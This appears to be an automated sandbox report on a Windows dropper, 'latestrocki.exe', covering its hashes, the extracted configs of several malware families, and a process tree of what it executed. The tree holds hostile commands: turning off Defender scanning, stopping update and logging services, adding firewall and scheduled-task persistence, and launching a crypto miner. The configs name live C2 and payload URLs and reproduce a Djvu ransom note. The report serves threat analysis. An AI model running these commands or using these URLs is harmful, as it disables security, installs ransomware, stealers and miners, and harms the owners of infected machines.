Analysis

  • max time kernel
    274s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2024 13:07

General

  • Target

    latestrocki.exe

  • Size

    9.3MB

  • MD5

    aca54a0ddb87930dc31fe9123c46d76d

  • SHA1

    ea2b2453cdff42d802117ab302028c9614a83a43

  • SHA256

    9587bda655a2dc730e4bdbd7de5ab39bc37de697fe22f449a6b2f851adaedfb8

  • SHA512

    0ce4c6283f9112413e247d3dc79e033afa90321f55f36eb9cb1b38f051987ca3b9c808c5b323112fefe702cb56c90a0006421a2ec46e343e4d1c04ecf63aa44e

  • SSDEEP

    196608:Zlzk48Er+gQjoW4fsySabpuYf8GLgB4cmNYqp5eiQt1Cz7Zy:ZKPgAEUy5bpjrLg7mia5JQt1C5

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Extracted

Family

fabookie

C2

http://app.alie3ksgaa.com/check/safe

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://habrafa.com/test1/get.php

Attributes
  • extension

    .cdcc

  • offline_id

    LBxKKiegnAy53rpqH3Pj2j46vwldiEt9kqHSuMt1

  • payload_url

    http://brusuax.com/dl/build2.exe

    http://habrafa.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-iVcrVFVRqu Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0846ASdw

rsa_pubkey.plain

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Fabookie payload 1 IoCs
  • Detect ZGRat V1 2 IoCs
  • Detected Djvu ransomware 7 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 38 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 15 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 63 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\latestrocki.exe
    "C:\Users\Admin\AppData\Local\Temp\latestrocki.exe"
    1⤵
      PID:3004
      • C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2492
        • C:\Users\Admin\AppData\Local\Temp\nso5D16.tmp
          C:\Users\Admin\AppData\Local\Temp\nso5D16.tmp
          3⤵
            PID:4440
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nso5D16.tmp" & del "C:\ProgramData\*.dll"" & exit
              4⤵
                PID:960
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 5
                  5⤵
                  • Delays execution with timeout.exe
                  PID:3472
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 2476
                4⤵
                • Program crash
                PID:2400
          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
            2⤵
              PID:2732
            • C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
              "C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              PID:1816
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                3⤵
                  PID:2668
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  3⤵
                  • Launches sc.exe
                  PID:968
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                  3⤵
                  • Launches sc.exe
                  PID:4736
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "WSNKISKT"
                  3⤵
                  • Launches sc.exe
                  PID:2468
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  3⤵
                  • Launches sc.exe
                  PID:3204
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "WSNKISKT"
                  3⤵
                  • Launches sc.exe
                  PID:4408
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2360
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  3⤵
                    PID:3524
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    3⤵
                      PID:4456
                    • C:\Windows\system32\powercfg.exe
                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      3⤵
                        PID:3628
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop dosvc
                        3⤵
                        • Launches sc.exe
                        PID:408
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop wuauserv
                        3⤵
                        • Launches sc.exe
                        PID:3264
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        3⤵
                        • Launches sc.exe
                        PID:1640
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop UsoSvc
                        3⤵
                        • Launches sc.exe
                        PID:4092
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        3⤵
                          PID:5028
                      • C:\Users\Admin\AppData\Local\Temp\rty25.exe
                        "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:4380
                      • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1820
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 372
                          3⤵
                          • Program crash
                          PID:3388
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 388
                          3⤵
                          • Program crash
                          PID:1660
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 384
                          3⤵
                          • Program crash
                          PID:1404
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 688
                          3⤵
                          • Program crash
                          PID:1060
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 720
                          3⤵
                          • Program crash
                          PID:4028
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 720
                          3⤵
                          • Program crash
                          PID:1392
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 748
                          3⤵
                          • Program crash
                          PID:2256
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 756
                          3⤵
                          • Program crash
                          PID:4344
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 748
                          3⤵
                          • Program crash
                          PID:2680
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 748
                          3⤵
                          • Program crash
                          PID:4988
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 668
                          3⤵
                          • Program crash
                          PID:2652
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 876
                          3⤵
                          • Program crash
                          PID:2628
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 792
                          3⤵
                          • Program crash
                          PID:4128
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 788
                          3⤵
                          • Program crash
                          PID:320
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 936
                          3⤵
                          • Program crash
                          PID:1128
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 928
                          3⤵
                          • Program crash
                          PID:4008
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 996
                          3⤵
                          • Program crash
                          PID:2404
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 1020
                          3⤵
                          • Program crash
                          PID:3948
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 704
                          3⤵
                          • Program crash
                          PID:3204
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1208
                        • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                          "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Checks for VirtualBox DLLs, possible anti-VM trick
                          • Drops file in Windows directory
                          • Modifies data under HKEY_USERS
                          • Suspicious use of WriteProcessMemory
                          PID:5016
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 352
                            4⤵
                            • Program crash
                            PID:2116
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 364
                            4⤵
                            • Program crash
                            PID:4608
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 652
                            4⤵
                            • Program crash
                            PID:3684
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 692
                            4⤵
                            • Program crash
                            PID:768
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 708
                            4⤵
                            • Program crash
                            PID:792
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 708
                            4⤵
                            • Program crash
                            PID:3736
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 724
                            4⤵
                            • Program crash
                            PID:1984
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 744
                            4⤵
                            • Program crash
                            PID:4092
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            4⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3756
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 336
                            4⤵
                            • Program crash
                            PID:2984
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                            4⤵
                              PID:1900
                              • C:\Windows\system32\netsh.exe
                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                5⤵
                                • Modifies Windows Firewall
                                PID:4512
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              4⤵
                                PID:516
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                  PID:3284
                                • C:\Windows\rss\csrss.exe
                                  C:\Windows\rss\csrss.exe
                                  4⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Manipulates WinMonFS driver.
                                  • Drops file in Windows directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:1168
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 392
                                    5⤵
                                    • Program crash
                                    PID:4984
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 680
                                    5⤵
                                    • Program crash
                                    PID:4964
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 728
                                    5⤵
                                    • Program crash
                                    PID:3736
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 724
                                    5⤵
                                    • Program crash
                                    PID:4116
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 776
                                    5⤵
                                    • Program crash
                                    PID:4220
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 792
                                    5⤵
                                    • Program crash
                                    PID:2484
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                      6⤵
                                      • Launches sc.exe
                                      PID:3928
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    5⤵
                                    • Drops file in System32 directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4032
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 724
                                    5⤵
                                    • Program crash
                                    PID:2624
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 388
                                    5⤵
                                    • Program crash
                                    PID:3264
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      6⤵
                                        PID:3928
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 372
                                      5⤵
                                      • Program crash
                                      PID:4512
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 972
                                      5⤵
                                      • Program crash
                                      PID:3228
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 928
                                      5⤵
                                      • Program crash
                                      PID:4980
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4888
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      schtasks /delete /tn ScheduledUpdate /f
                                      5⤵
                                        PID:2052
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        5⤵
                                        • Creates scheduled task(s)
                                        PID:628
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:516
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 928
                                        5⤵
                                        • Program crash
                                        PID:4584
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 984
                                        5⤵
                                        • Program crash
                                        PID:3096
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                        5⤵
                                        • Executes dropped EXE
                                        PID:216
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1004
                                        5⤵
                                        • Program crash
                                        PID:4092
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 760
                                        5⤵
                                        • Program crash
                                        PID:5028
                                        • C:\Windows\system32\wusa.exe
                                          wusa /uninstall /kb:890830 /quiet /norestart
                                          6⤵
                                            PID:1564
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          5⤵
                                          • Creates scheduled task(s)
                                          PID:1272
                                        • C:\Windows\windefender.exe
                                          "C:\Windows\windefender.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:4636
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                            6⤵
                                              PID:2484
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1124
                                            5⤵
                                            • Program crash
                                            PID:4936
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1140
                                            5⤵
                                            • Program crash
                                            PID:2332
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1156
                                            5⤵
                                            • Program crash
                                            PID:2128
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1116
                                            5⤵
                                            • Program crash
                                            PID:2828
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1052
                                            5⤵
                                            • Program crash
                                            PID:3096
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1076
                                            5⤵
                                            • Program crash
                                            PID:228
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1068
                                            5⤵
                                            • Program crash
                                            PID:3364
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1156
                                            5⤵
                                            • Program crash
                                            PID:1300
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:3348
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                                            5⤵
                                            • Executes dropped EXE
                                            PID:464
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                              C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --tls --nicehash -o showlock.net:443 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --tls --nicehash -o showlock.net:80 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --nicehash --http-port 3433 --http-access-token 200e8a1e-3ea0-4957-9d39-5244c8436134 --randomx-wrmsr=-1
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of FindShellTrayWindow
                                              PID:3156
                                            • C:\Windows\rss\csrss.exe
                                              C:\Windows\rss\csrss.exe -hide 3156
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4928
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 340
                                                7⤵
                                                • Program crash
                                                PID:5044
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 356
                                                7⤵
                                                • Program crash
                                                PID:3192
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 356
                                                7⤵
                                                • Program crash
                                                PID:3852
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 664
                                                7⤵
                                                • Program crash
                                                PID:1620
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 700
                                                7⤵
                                                • Program crash
                                                PID:2636
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 700
                                                7⤵
                                                • Program crash
                                                PID:4084
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 736
                                                7⤵
                                                • Program crash
                                                PID:2924
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 744
                                                7⤵
                                                • Program crash
                                                PID:1544
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 744
                                                7⤵
                                                • Program crash
                                                PID:2252
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                7⤵
                                                  PID:548
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              5⤵
                                              • Modifies data under HKEY_USERS
                                              PID:2716
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 1196
                                              5⤵
                                              • Program crash
                                              PID:2828
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                              C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                              5⤵
                                                PID:5116
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                5⤵
                                                  PID:1012
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1820 -ip 1820
                                          1⤵
                                            PID:3288
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1820 -ip 1820
                                            1⤵
                                              PID:4836
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1820 -ip 1820
                                              1⤵
                                                PID:1564
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1820 -ip 1820
                                                1⤵
                                                  PID:404
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1820 -ip 1820
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1820 -ip 1820
                                                    1⤵
                                                      PID:3444
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1820 -ip 1820
                                                      1⤵
                                                        PID:3356
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1820 -ip 1820
                                                        1⤵
                                                          PID:3912
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1820 -ip 1820
                                                          1⤵
                                                            PID:2888
